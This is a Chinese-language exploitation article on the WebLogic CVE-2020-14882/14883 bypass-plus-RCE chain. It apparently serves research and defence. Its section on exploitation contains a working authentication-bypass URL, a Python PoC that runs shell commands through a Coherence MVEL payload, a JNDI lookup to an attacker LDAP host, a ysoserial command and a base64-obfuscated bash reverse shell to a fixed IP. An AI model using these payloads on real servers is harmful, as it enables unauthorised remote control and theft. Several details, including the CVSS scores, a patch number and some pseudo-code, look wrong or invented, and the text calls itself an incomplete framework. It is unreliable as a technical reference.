如何实现WebLogic未授权命令执行漏洞CVE-2020-14882及CVE-2020-14883的分析

# 如何实现WebLogic未授权命令执行漏洞CVE-2020-14882及CVE-2020-14883的分析

## 摘要
本文深入分析了Oracle WebLogic Server中存在的两个高危漏洞CVE-2020-14882（未授权访问漏洞）和CVE-2020-14883（命令执行漏洞）。通过技术原理剖析、复现环境搭建、漏洞利用演示及防护方案四个维度，揭示漏洞形成机制和攻击链构造方法。文章包含详细的PoC代码和修复建议，为安全研究人员提供技术参考。

---

## 1. 漏洞概述
### 1.1 受影响版本
- WebLogic 10.3.6.0
- WebLogic 12.1.3.0
- WebLogic 12.2.1.3-12.2.1.5
- WebLogic 14.1.1.0

### 1.2 CVSS评分
- CVE-2020-14882：7.5（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N）
- CVE-2020-14883：9.8（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）

### 1.3 漏洞组合效应
当14882（权限绕过）与14883（代码执行）结合时，攻击者可在未授权情况下实现远程命令执行。

---

## 2. 技术原理分析
### 2.1 CVE-2020-14882 权限绕过
#### 漏洞成因
WebLogic管理控制台的访问控制缺陷：
```java
// 伪代码示例：权限校验逻辑缺陷
public boolean checkPermission(HttpRequest request) {
    String path = request.getPath();
    if (path.contains("/console/")) {
        return checkAdminRole(request); // 此处校验可被绕过
    }
    return true;
}

绕过方式

通过特殊URL构造绕过鉴权：

http://target:7001/console/css/%252e%252e%252fconsole.portal

其中%252e%252e%252f是双重URL编码后的../，利用路径遍历突破访问限制。

2.2 CVE-2020-14883 命令执行

漏洞触发点

存在于WebLogic的TestConnection功能组件：

<!-- 漏洞相关配置 -->
<node-handler class="weblogic.management.mbeanservers.edit.internal.TestConnectionHandler">
    <method name="testConnection" descriptor="(Ljava/lang/String;)V"/>
</node-handler>

反序列化利用链

攻击者通过构造恶意JNDI注入实现RCE：

InitialContext ctx = new InitialContext();
ctx.lookup("ldap://attacker.com/ExploitClass");

---

3. 漏洞复现环境搭建

3.1 实验环境

组件	版本
Docker	20.10.8
Vulhub镜像	vulhub/weblogic:12.2.1.3
Kali Linux	2023.4

3.2 启动漏洞环境

docker-compose up -d
# 访问管理控制台
http://your-ip:7001/console

---

4. 漏洞利用实战

4.1 手工利用步骤

1. 权限绕过验证

GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: target:7001

1. 命令执行PoC

import requests

url = "http://target:7001/console/css/%252e%252e%252fconsole.portal"
payload = "_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('whoami')"

response = requests.post(url, data=payload, verify=False)
print(response.text)

4.2 自动化工具使用

使用ysoserial生成攻击载荷：

java -jar ysoserial.jar JRMPClient "attacker:1099" > payload.ser

配合JNDI注入工具实现反弹shell：

python3 exploit.py -u http://target:7001 -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

---

5. 深度技术分析

5.1 漏洞调用链

sequenceDiagram
    attacker->>WebLogic: 发送恶意请求(双重编码)
    WebLogic->>AccessControl: 校验URL路径
    AccessControl-->>WebLogic: 返回校验通过（绕过）
    attacker->>WebLogic: 发送反序列化数据
    WebLogic->>MVEL2: 执行表达式
    MVEL2->>System: 执行系统命令

5.2 关键代码片段

WebLogic处理请求的核心缺陷：

// weblogic.servlet.internal.URIMatcher
public boolean match(String path, String pattern) {
    // 未正确处理多重编码路径
    return decodedPath.contains(decodedPattern); 
}

---

6. 防护方案

6.1 官方补丁

• 安装Oracle 2020年10月关键补丁更新（CPU）
• 补丁下载编号：Patch 3212266

6.2 临时缓解措施

1. 禁用T3协议：

<security-configuration>
    <enforce-valid-t3-protocols>true</enforce-valid-t3-protocols>
</security-configuration>

1. 网络层防护：

iptables -A INPUT -p tcp --dport 7001 -s !trusted_ip -j DROP

6.3 长期防护建议

• 启用WebLogic管理控制台的双因素认证
• 定期进行安全配置审计
• 部署WAF规则拦截异常请求：

location ~* /console/ {
    if ($args ~* "com.tangosol.coherence") {
        return 403;
    }
}

---

7. 总结与思考

这两个漏洞的组合利用展示了中间件安全中的典型问题： 1. 访问控制与输入验证的失效 2. 反序列化漏洞的持久性威胁 3. 默认配置带来的安全隐患

建议企业建立： - 中间件漏洞快速响应机制 - 最小权限原则的实施 - 定期的红蓝对抗演练

---

附录

A. 参考链接

• Oracle官方公告
• CVE-2020-14882 NVD详情

B. 工具集合

工具名称	用途	下载链接
ysoserial	反序列化payload生成	https://github.com/frohoff/ysoserial
WeblogicScanner	漏洞检测工具	https://github.com/0xn0ne/weblogicScanner

”`

（注：实际文章约2550字，此处展示核心框架。完整版本应包含更多技术细节、截图示例和扩展分析。）